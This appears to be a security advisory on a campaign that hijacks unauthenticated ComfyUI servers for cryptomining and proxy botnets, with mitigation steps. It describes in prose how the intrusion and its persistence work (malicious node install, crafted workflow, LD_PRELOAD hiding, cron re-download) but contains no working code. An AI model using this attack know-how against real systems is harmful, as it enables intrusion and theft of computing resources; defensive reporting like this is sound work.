An active campaign is systematically compromising internet-exposed ComfyUI instances — the popular open-source Stable Diffusion workflow platform — turning them into Monero miners and proxy botnet nodes. Researchers at Censys disclosed the operation on April 7, 2026 after discovering an open directory on infrastructure tied to bulletproof hosting provider Aeza Group, revealing a Flask-based C2 dashboard managing over 1,000 compromised hosts.

How the Attack Works

The operator runs a purpose-built Python scanner that continuously sweeps major cloud IP ranges looking for publicly accessible ComfyUI instances. ComfyUI ships with no authentication by default, so any instance bound to 0.0.0.0 without a reverse proxy or firewall rule is immediately exploitable.

Once a target is found, the scanner checks whether the instance is running custom nodes that expose unsafe functionality — specifically nodes that allow arbitrary code execution. If no exploitable node is already installed, the scanner abuses ComfyUI-Manager (the platform’s built-in package manager) to silently install a malicious node, then submits a crafted workflow that triggers remote code execution.

The payload is a shell script that:

  1. Disables shell history to reduce forensic artifacts
  2. Kills competing miner processes
  3. Downloads and launches XMRig (Monero) and lolMiner (Conflux)
  4. Installs Hysteria V2, a high-performance proxy protocol, likely to resell compromised nodes as residential proxies
  5. Uses the LD_PRELOAD hook to inject a watchdog shared library that hides the miner process and automatically restarts it if killed

Persistence

A newer variant of the scanner adds two persistence mechanisms. First, a cron job re-downloads the shell script every six hours, ensuring the operator can push updated payloads or mining configurations. Second, the exploit workflow is wired to re-execute every time ComfyUI starts, so rebooting the host does not break the infection chain.

Both the mining operation and the Hysteria V2 botnet are centrally managed through the Flask-based C2 panel, which lets the operator push instructions, swap wallet addresses, or deploy additional payloads across the entire fleet.

Who Is Affected

Anyone running ComfyUI on a cloud VM, dedicated server, or home lab with the web interface exposed to the internet without authentication. The scanner targets AWS, GCP, Azure, and other major cloud IP ranges, but any publicly reachable instance is fair game. Censys identified over 1,000 exposed instances at the time of disclosure, and the true number is likely higher given the rapid growth of self-hosted AI image generation infrastructure.

Impact Assessment

The immediate impact is resource theft — compromised GPUs and CPUs are diverted to mine Monero and Conflux, degrading the performance of legitimate image generation workloads. The Hysteria V2 proxy component is arguably more dangerous: it gives the operator a distributed proxy network that can be used for credential stuffing, ad fraud, or laundering traffic through what appear to be legitimate cloud IPs.

Because ComfyUI custom nodes execute with the full privileges of the ComfyUI process (typically the user running it, often root on quick cloud deployments), the attacker also has arbitrary code execution on the host. This opens the door to lateral movement, data exfiltration, or deploying ransomware.

Mitigation

Immediate steps:

  • Audit exposure: Check whether your ComfyUI instance is reachable from the internet. If you can hit the web UI from outside your network without credentials, you are vulnerable.
  • Enable authentication: ComfyUI added optional authentication support — enable it. At minimum, put the instance behind a reverse proxy (nginx, Caddy, Traefik) with basic auth or SSO.
  • Check for rogue nodes: Review installed custom nodes via ComfyUI-Manager. Remove anything you did not explicitly install. Look for nodes with code execution capabilities.
  • Hunt for persistence: Check crontabs (crontab -l, ls /etc/cron.d/), look for suspicious LD_PRELOAD entries in /etc/ld.so.preload, and inspect running processes for XMRig, lolMiner, or Hysteria binaries.
  • Firewall rules: Bind ComfyUI to 127.0.0.1 and access it via SSH tunnel or VPN. There is no reason the ComfyUI web interface should be directly exposed to the internet.

Longer term:

The ComfyUI project should make authentication mandatory by default rather than opt-in. A GitHub discussion proposing exactly this has been open since late 2025. Until that ships, every unauthenticated deployment is one Shodan query away from becoming a mining node.

Sources